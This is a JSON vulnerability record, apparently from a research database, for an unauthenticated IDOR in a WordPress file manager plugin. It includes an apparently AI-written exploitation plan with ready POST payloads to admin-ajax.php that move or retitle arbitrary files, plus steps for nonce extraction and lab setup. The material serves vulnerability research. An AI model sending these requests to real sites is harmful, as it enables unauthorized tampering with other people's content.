[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$faa03eBeL34DtdEk_lZnaQRrSCZ9kFeIXI3lSZKKs3WQ":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":28,"research_verified":29,"research_rounds_completed":30,"research_plan":31,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":32,"research_started_at":33,"research_completed_at":34,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":29,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":29,"source_links":35},"CVE-2026-25005","frontend-file-manager-plugin-unauthenticated-insecure-direct-object-reference","Frontend File Manager Plugin \u003C= 23.5 - Unauthenticated Insecure Direct Object Reference","The Frontend File Manager Plugin plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 23.5 due to missing validation on a user controlled key. 
This makes it possible for unauthenticated attackers to perform an unauthorized action.","nmedia-user-file-uploader",null,"\u003C=23.5","23.6","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Authorization Bypass Through User-Controlled Key","2026-01-16 00:00:00","2026-05-04 15:07:55",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F8a64d68b-8a0d-451b-ae2e-3cc583b4ed5a?source=api-prod",109,[22,23,24,25,26,27],"inc\u002Fadmin.php","inc\u002Farrays.php","inc\u002Fcallback-functions.php","inc\u002Ffiles.php","readme.txt","wp-file-manager.php","researched",false,3,"### 1. Vulnerability Summary\nThe **Frontend File Manager Plugin (\u003C= 23.5)** is vulnerable to an **Insecure Direct Object Reference (IDOR)**. The vulnerability exists because several AJAX callback functions registered for unauthenticated users (via the `wp_ajax_nopriv_` hook) do not perform sufficient authorization checks on the object being modified. \n\nSpecifically, the function `nm_uploadfile_move_file` (and potentially `wpfm_edit_file_title_desc`) fails to verify that the user requesting a change to a file (identified by a user-supplied `file_id`) has the permission to modify that specific file. In `nm_uploadfile_move_file`, if the \"Guest Upload\" setting is enabled, the code explicitly skips author validation, allowing any unauthenticated user to move any file (even private admin files) to any other directory.\n\n### 2. Attack Vector Analysis\n*   **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action**: `nm_uploadfile_move_file`\n*   **Vulnerable Parameter**: `file_id` (The IDOR key) and `parent_id` (The target directory).\n*   **Authentication**: Unauthenticated (if guest uploads are enabled) or Low-Privileged.\n*   **Preconditions**: \n    1.  The plugin setting `wpfm_allow_guest_upload` must be set to `yes` (common in environments where the plugin is used for public submissions).\n    2. 
 The attacker needs the `post_id` of a target file.\n\n### 3. Code Flow\n1.  **Entry Point**: An unauthenticated user sends a POST request to `admin-ajax.php` with `action=nm_uploadfile_move_file`.\n2.  **Hook Registration**: In `inc\u002Farrays.php`, `wpfm_array_get_ajax_callbacks()` returns `\"nm_uploadfile_move_file\" => true`. This `true` value causes the plugin to register both `wp_ajax_nm_uploadfile_move_file` and `wp_ajax_nopriv_nm_uploadfile_move_file` (in `inc\u002Fhooks.php`).\n3.  **Vulnerable Function**: The execution hits `nm_uploadfile_move_file()` in `inc\u002Fcallback-functions.php`.\n4.  **Bypassed Check**: \n    ```php\n    $allow_guest = wpfm_get_option('_allow_guest_upload') == 'yes' ? true : false;\n    if( !$allow_guest && ! wpfm_is_current_user_post_author($_POST['file_id'] )) {\n        wp_send_json_error(__(\"Sorry, not allowed\", \"wpfm\"));\n    }\n    ```\n    If `_allow_guest_upload` is `yes`, the entire authorization block is bypassed.\n5.  **The Sink**: The function takes `$_REQUEST['file_id']` and `$_REQUEST['parent_id']` and calls `wp_update_post()`:\n    ```php\n    $result  = array(\n        'ID' => $file_id, \n        'post_parent' => $dir_id \n    );\n    $post_id = wp_update_post( $result, true );\n    ```\n    This updates the parent of any arbitrary WordPress post ID, provided the post type is compatible.\n\n### 4. Nonce Acquisition Strategy\nWhile the source code provided for 23.5 shows the nonce check is **commented out** in `nm_uploadfile_move_file`, it is best practice to provide a strategy in case it is enforced in a specific build.\n\n1.  **Identify Shortcode**: The plugin uses the shortcode `[ffmwp]`.\n2.  **Create Trigger Page**: Create a public page containing this shortcode to force the plugin to enqueue its scripts and localize its variables.\n    ```bash\n    wp post create --post_type=page --post_title=\"File Manager\" --post_status=publish --post_content='[ffmwp]'\n    ```\n3.  
**Extract Nonce**: Navigate to the new page and extract the nonce from the `wpfm_file_vars` or `wpfm_ajax_nonce` object.\n    *   **Variable**: `window.wpfm_file_vars` (inferred from common plugin patterns) or check for `wpfm_ajax_nonce` in the HTML.\n    *   **JS Command**: `browser_eval(\"window.wpfm_file_vars?.wpfm_ajax_nonce\")`\n\n### 5. Exploitation Strategy\nWe will demonstrate the IDOR by moving a \"Private Admin File\" into a different folder, effectively altering the file structure of the site.\n\n**Step 1: Discover File IDs**\nIdentify a file ID and a folder ID (post IDs for the `wpfm-files` post type).\n\n**Step 2: Send Exploitation Request**\nSend the following POST request via the `http_request` tool:\n\n*   **URL**: `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method**: `POST`\n*   **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body**:\n    ```\n    action=nm_uploadfile_move_file&file_id=\u003CTARGET_FILE_ID>&parent_id=\u003CNEW_FOLDER_ID>&wpfm_ajax_nonce=\u003CNONCE>\n    ```\n\n### 6. Test Data Setup\nPerform the following via WP-CLI to prepare the environment:\n1.  **Enable Guest Upload**:\n    ```bash\n    # Setting the option directly in the settings array\n    wp option patch insert wpfm_settings wpfm_allow_guest_upload yes\n    ```\n2.  **Create a Folder (Parent)**:\n    ```bash\n    wp post create --post_type=wpfm-files --post_title=\"Target Folder\" --post_status=publish --post_author=1\n    ```\n3.  **Create a File (to be moved)**:\n    ```bash\n    wp post create --post_type=wpfm-files --post_title=\"Sensitive File\" --post_status=publish --post_author=1\n    ```\n4.  **Create a Public Page**:\n    ```bash\n    wp post create --post_type=page --post_title=\"Upload\" --post_status=publish --post_content='[ffmwp]'\n    ```\n\n### 7. 
Expected Results\n*   **Response**: The server should return a JSON success message:\n    `{\"success\":true,\"data\":{\"message\":\"File is move successfully\", ...}}`\n*   **Database Change**: The `post_parent` column of the `wpfm-files` post identified by `file_id` will be updated to the `parent_id`.\n\n### 8. Verification Steps\nAfter sending the HTTP request, verify the IDOR via WP-CLI:\n```bash\n# Check if the parent_id has changed for the sensitive file\nwp post get \u003CFILE_ID> --field=post_parent\n```\nIf the output matches `\u003CNEW_FOLDER_ID>`, the exploit is successful.\n\n### 9. Alternative Approaches\nIf `nm_uploadfile_move_file` is patched or behaves differently, target **`wpfm_edit_file_title_desc`**:\n*   **Action**: `wpfm_edit_file_title_desc`\n*   **Payload**: `action=wpfm_edit_file_title_desc&file_id=\u003CID>&file_title=HackedByIDOR&file_content=NewDescription`\n*   **Verification**: `wp post get \u003CID> --field=post_title`\n\nThe logic is identical: unauthenticated access via `nopriv` hook + missing validation of the `file_id` owner.","gemini-3-flash-preview","2026-05-05 08:01:38","2026-05-05 08:02:28",{"type":36,"vulnerable_version":37,"fixed_version":11,"vulnerable_browse":38,"vulnerable_zip":39,"fixed_browse":40,"fixed_zip":41,"all_tags":42},"plugin","23.5","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnmedia-user-file-uploader\u002Ftags\u002F23.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnmedia-user-file-uploader.23.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnmedia-user-file-uploader\u002Ftags\u002F23.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnmedia-user-file-uploader.23.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnmedia-user-file-uploader\u002Ftags"]